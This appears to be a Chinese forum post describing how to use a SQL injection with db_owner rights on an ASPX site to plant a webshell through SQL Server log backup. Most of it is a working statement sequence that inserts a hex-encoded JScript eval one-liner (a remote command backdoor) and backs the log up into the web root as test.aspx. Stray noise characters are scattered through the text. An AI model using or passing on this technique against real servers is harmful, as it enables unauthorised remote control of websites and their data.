最近在看个网站的时候,aspx的字符型注点,db_owner权限,但是不支持asp,常见的方法是log备份asp,这次我们要备份aspx了(在这只讨论备份)。# e9 D2 }3 ?8 T/ T
但是直接写一句话虽然可以备份成功,但是执行时会报错,因此直接备份的一句话是无法执行的。, l! P3 G$ M: O- {% M) S; _" U/ O
经过查找资料和本人测试发现,利用ie备份的时候,insert时,向表中插入内容,都是重复插入3条数据(ie6,ie8均如此),因此导致执行时出错;利用查询分析器insert的时候,只插入一条数据,因此不会报错,所以一句话成功执行。
% A6 _3 B/ @, s2 A4 M3 a& J经测试,备份如下格式:空格一句话空格、<br>一句话<br>时,有一定概率可以成功。不知道是什么原因,特来论坛请教,望高手解惑。' d8 W5 R: S# A" l2 d
( K, g0 d2 R' D5 y( x
--------------------------------------------------------------
a8 |# V, ~* Z, X今天又试了下,发现直接备份有时候也可以成功,晕死了,为防止备份时插入多条内容导致出错,7 H# t' L! v0 m+ _7 k
自己修改备份语句如下:
- _ C, ]$ }5 E6 A) d: W$ J) UDrop table cmd;--9 s' V D4 L2 n8 C _7 N) V
alter database db_test set RECOVERY FULL;--# S3 N# X4 b4 F2 z" i: L
create table cmd (a image,id int IDENTITY (1,1)); --添加了个自动编号的字段+ [' q/ U% r! F8 m7 c8 }$ O% x" F
backup log db_test to disk = 'c:\bak' with init;--4 E5 G/ Q+ A8 |) S. R2 v; F" V1 W
insert into cmd (a) values(0x3C25402050616765204C616E67756167653D224A73637269707422253E3C256576616C28526571756573742E4974656D5B227A225D2C22756E7361666522293B253E);--% y4 n1 {: ^0 C% D5 r- b/ D
delete from cmd where id>1;--删除id>1的数据
# p& q5 b( R9 w; c9 dbackup log db_test to disk = 'e:\webroot\test.aspx';--
) Q. w6 r; J5 uDrop table cmd;--. \$ H9 Q% c; d' @7 l
希望对大家有用。 |